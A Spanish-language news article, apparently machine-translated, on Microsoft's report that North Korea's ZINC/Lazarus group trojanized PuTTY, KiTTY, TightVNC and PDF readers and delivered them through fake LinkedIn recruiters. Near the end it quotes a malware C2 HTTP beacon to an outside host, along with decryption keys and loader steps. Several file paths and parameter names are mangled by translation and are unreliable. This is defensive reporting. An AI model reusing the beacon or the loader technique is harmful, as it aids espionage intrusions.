imágenes falsas
Los piratas informáticos respaldados por el gobierno de Corea del Norte están utilizando como armas conocidas piezas de software de código abierto en una campaña en curso que ya ha logrado comprometer a “numerosas” organizaciones en las industrias de servicios de TI, de defensa y aeroespacial y de medios, dijo Microsoft el jueves.
ZINC, el nombre de Microsoft para un grupo de actores de amenazas también llamado Lazarus, que es mejor conocido por llevar a cabo el devastador compromiso de 2014 de Sony Pictures Entertainment, ha estado enlazando a PuTTY y otras aplicaciones legítimas de código abierto con un código altamente encriptado que finalmente instala malware de espionaje.
Luego, los piratas informáticos se hacen pasar por reclutadores de trabajo y se conectan con personas de organizaciones objetivo a través de LinkedIn. Después de desarrollar un nivel de confianza en una serie de conversaciones y, finalmente, pasarlas al mensajero de WhatsApp, los piratas informáticos instruyen a las personas para que instalen las aplicaciones, que infectan los entornos de trabajo de los empleados.
microsoft
“Los actores han comprometido con éxito a numerosas organizaciones desde junio de 2022”, escribieron en una publicación miembros de los equipos de Microsoft Security Threat Intelligence y LinkedIn Threat Prevention and Defense. “Debido al amplio uso de las plataformas y el software que utiliza ZINC en esta campaña, ZINC podría representar una amenaza significativa para las personas y organizaciones en múltiples sectores y regiones”.
PuTTY es un popular emulador de terminal, consola serie y aplicación de transferencia de archivos de red que admite protocolos de red, incluidos SSH, SCP, Telnet, rlogin y conexión de socket sin formato. Hace dos semanas, la firma de seguridad Mandiant advirtió que los piratas informáticos con vínculos con Corea del Norte la habían troyanizado en una campaña que comprometió con éxito la red de un cliente. La publicación del jueves decía que los mismos piratas informáticos también armaron KiTTY, TightVNC, Sumatra PDF Reader y el software muPDF/Subliminal Recording con un código que instala el mismo malware de espionaje, que Microsoft ha llamado ZetaNile.
Lazarus fue una vez una banda heterogénea de piratas informáticos con solo recursos y habilidades marginales. Durante la última década, su destreza ha crecido considerablemente. Sus ataques a los intercambios de criptomonedas en los últimos cinco años han generado miles de millones de dólares para los programas de armas de destrucción masiva del país. Regularmente encuentran y explotan vulnerabilidades de día cero en aplicaciones fuertemente fortificadas y usan muchas de las mismas técnicas de malware que usan otros grupos patrocinados por el estado.
El grupo se basa principalmente en el phishing selectivo como vector inicial hacia sus víctimas, pero también utilizan otras formas de ingeniería social y compromisos de sitios web en ocasiones. Un tema común es que los miembros apunten a los empleados de las organizaciones que quieren comprometer, a menudo engañándolos o coaccionándolos para que instalen software troyano.
Las aplicaciones troyanizadas PuTTY y KiTTY que Microsoft observó utilizan un mecanismo inteligente para garantizar que solo los objetivos previstos se infecten y que no infecten a otros sin darse cuenta. Los instaladores de aplicaciones no ejecutan ningún código malicioso. En cambio, el malware ZetaNile se instala solo cuando las aplicaciones se conectan a una dirección IP específica y usan las credenciales de inicio de sesión que los reclutadores falsos dan a los objetivos.
El ejecutable troyano PuTTY utiliza una técnica llamada secuestro de orden de búsqueda de DLL, que carga y descifra una carga útil de segunda etapa cuando se presenta con la clave “0CE1241A44557AA438F27BC6D4ACA246” para usar como comando y control. Una vez que se conectan con éxito al servidor C2, los atacantes pueden instalar malware adicional en el dispositivo comprometido. La aplicación KiTTY funciona de la misma manera.
Al igual que KiTTY y PuTTY, el visor malicioso TightVNC instala su carga útil final solo cuando un usuario selecciona ec2-aet-tech.w-ada[.]amazonaws en el menú desplegable de hosts remotos rellenados previamente en TightVNC Viewer.
microsoft
La publicación del jueves continuó:
ZINC ha utilizado la versión troyanizada de Sumatra PDF Reader denominada SecurePDF.exe desde al menos 2019 y sigue siendo una artesanía exclusiva de ZINC. SecurePDF.exe es un cargador modularizado que puede instalar el implante ZetaNile cargando un archivo temático de solicitud de trabajo armado con una extensión .PDF. El PDF falso contiene un encabezado “SPV005”, una clave de descifrado, una carga útil de implante de segunda etapa cifrada y un PDF de señuelo cifrado, que se procesa en Sumatra PDF Reader cuando se abre el archivo.
Una vez cargado en la memoria, el malware de segunda etapa se configura para enviar el nombre de host del sistema de la víctima y la información del dispositivo utilizando algoritmos de codificación personalizados a un servidor de comunicación C2 como parte del proceso de verificación de C2. Los atacantes pueden instalar malware adicional en los dispositivos comprometidos utilizando la comunicación C2 según sea necesario.
microsoft
La publicación continuó:
Dentro de la versión troyana del instalador muPDF/Subliminal Recording, setup.exe está configurado para verificar si la ruta del archivo ISSetupRequisitos previosSetup64.exe existe y escribe C:colrctlcolorui.dll en el disco después de extraer el ejecutable incrustado dentro setup.exe. Luego copia C:WindowsSystem32ColorCpl.exe a C:ColorCtrlColorCpl.exe. Para el malware de segunda etapa, el instalador malicioso crea un nuevo proceso C:colorctrlcolorcpl.exe C3A9B30B6A313F289297C9A36730DB6Dy el argumento C3A9B30B6A313F289297C9A36730DB6D se pasa a colorui.dll como clave de descifrado. la DLL colorui.dll, que Microsoft está rastreando como la familia de malware EventHorizon, se inyecta en C:WindowsSistemacredwiz.exe o iexpress.exe para enviar solicitudes C2 HTTP como parte del proceso de registro de la víctima y para obtener una carga útil adicional.
POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]combbs=[encrypted payload]= &artículo=[encrypted payload]
La publicación proporciona indicadores técnicos que las organizaciones pueden buscar para determinar si algún punto final dentro de sus redes está infectado. También incluye direcciones IP utilizadas en la campaña que los administradores pueden agregar a sus listas de bloqueo de red.